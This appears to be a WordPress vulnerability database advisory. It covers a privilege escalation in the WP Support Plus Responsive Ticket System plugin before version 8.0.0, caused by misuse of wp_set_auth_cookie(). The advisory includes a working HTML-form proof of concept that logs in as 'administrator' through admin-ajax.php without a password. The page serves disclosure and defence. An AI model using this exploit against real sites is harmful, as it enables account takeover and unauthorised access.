WordPress Plugin Vulnerabilities
WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
Proof of Concept
<form method="post" action="http://example.com/wp-admin/admin-ajax.php"> Username: <input type="text" name="username" value="administrator"> <input type="hidden" name="email" value="sth"> <input type="hidden" name="action" value="loginGuestFacebook"> <input type="submit" value="Login"> </form>
Affects Plugins
References
Classification
Type
PRIVESC
OWASP top 10
CWE
Miscellaneous
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-08-01 (about 6 years ago)
Added
2020-03-08 (about 4 years ago)
Last Updated
2020-03-09 (about 4 years ago)